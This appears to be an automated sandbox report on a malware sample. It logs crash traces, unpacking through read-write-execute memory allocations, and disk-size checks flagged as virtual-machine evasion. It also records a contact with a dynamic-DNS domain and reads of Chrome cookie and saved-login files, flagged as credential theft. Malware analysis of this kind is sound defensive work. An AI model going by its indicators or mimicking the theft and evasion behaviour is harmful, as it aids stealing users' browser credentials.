__exception__ Oct. 19, 2023, 9:33 a.m.	stacktrace: 0x4f0ecb 0x4f057d 0x4f053d DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f52652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f6264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f62e95 CoUninitializeEE+0x789b CreateAssemblyNameObject-0x63ba clr+0x270df @ 0x71f770df LogHelp_TerminateOnAssert+0x55ee GetPrivateContextsPerfCounters-0x13e54 clr+0x7412e @ 0x71fc412e mscorlib+0x2f1c22 @ 0x711a1c22 mscorlib+0x2f1b99 @ 0x711a1b99 mscorlib+0x2f0814 @ 0x711a0814 mscorlib+0x307407 @ 0x711b7407 0x4f006c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f52652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f6264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f62e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x720174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72017610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x720a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x720a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x720a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x720a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x725ff5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72677f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72674de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 e8 5d 9d c8 70 89 85 44 ff ff ff 8b 95 44 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4f12e8 registers.esp: 4124380 registers.edi: 4124568 registers.eax: 36179848 registers.ebp: 4124580 registers.edx: 0 registers.ebx: 4124844 registers.esi: 36179848 registers.ecx: 0	1	0	0
__exception__ Oct. 19, 2023, 9:33 a.m.	stacktrace: 0xab0644 0xab05d1 0xab0419 0xab00e8 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x718b2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x718c264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x718c2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x719774ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71977610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71a01dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71a01e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71a01f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71a0416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x725ff5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72677f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72674de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab38ef registers.esp: 3338664 registers.edi: 3338688 registers.eax: 0 registers.ebp: 3338700 registers.edx: 195 registers.ebx: 3338940 registers.esi: 38032420 registers.ecx: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 19, 2023, 9:33 a.m.

stacktrace:

0x4f0ecb
0x4f057d
0x4f053d
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f52652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f6264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f62e95
CoUninitializeEE+0x789b CreateAssemblyNameObject-0x63ba clr+0x270df @ 0x71f770df
LogHelp_TerminateOnAssert+0x55ee GetPrivateContextsPerfCounters-0x13e54 clr+0x7412e @ 0x71fc412e
mscorlib+0x2f1c22 @ 0x711a1c22
mscorlib+0x2f1b99 @ 0x711a1b99
mscorlib+0x2f0814 @ 0x711a0814
mscorlib+0x307407 @ 0x711b7407
0x4f006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f52652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f6264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f62e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x720174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72017610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x720a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x720a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x720a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x720a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x725ff5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72677f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72674de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 5d 9d c8 70 89 85 44 ff ff ff 8b 95 44
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4f12e8
registers.esp: 4124380
registers.edi: 4124568
registers.eax: 36179848
registers.ebp: 4124580
registers.edx: 0
registers.ebx: 4124844
registers.esi: 36179848
registers.ecx: 0

__exception__

Oct. 19, 2023, 9:33 a.m.

stacktrace:

0xab0644
0xab05d1
0xab0419
0xab00e8
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x718b2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x718c264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x718c2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x719774ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71977610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x71a01dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x71a01e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x71a01f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x71a0416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x725ff5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72677f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72674de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xab38ef
registers.esp: 3338664
registers.edi: 3338688
registers.eax: 0
registers.ebp: 3338700
registers.edx: 195
registers.ebx: 3338940
registers.esi: 38032420
registers.ecx: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Connects to a Dynamic DNS Domain (1 event)

domain

chongmei33.publicvm.com

Performs some HTTP requests (1 event)

request

GET http://ip-api.com/json/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 211 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 19, 2023, 9:32 a.m.	process_identifier: 2684 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73662000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71f51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71f52000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00405000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00407000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e691000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e692000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (19 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Oct. 19, 2023, 9:32 a.m.	number_of_free_clusters: 3252534 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:33 a.m.	number_of_free_clusters: 3252365 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:33 a.m.	number_of_free_clusters: 3252361 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:33 a.m.	number_of_free_clusters: 3252352 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:33 a.m.	number_of_free_clusters: 3252352 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:33 a.m.	number_of_free_clusters: 3252352 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:33 a.m.	number_of_free_clusters: 3252352 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:33 a.m.	number_of_free_clusters: 2399668 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:33 a.m.	number_of_free_clusters: 3252108 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:33 a.m.	number_of_free_clusters: 3252108 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:34 a.m.	number_of_free_clusters: 3252108 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:34 a.m.	number_of_free_clusters: 3251980 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:34 a.m.	number_of_free_clusters: 3251974 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:34 a.m.	number_of_free_clusters: 3251974 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:34 a.m.	number_of_free_clusters: 3251974 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:34 a.m.	number_of_free_clusters: 3251974 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:34 a.m.	number_of_free_clusters: 3251974 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:34 a.m.	number_of_free_clusters: 3251974 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Oct. 19, 2023, 9:34 a.m.	number_of_free_clusters: 3251973 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (11 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
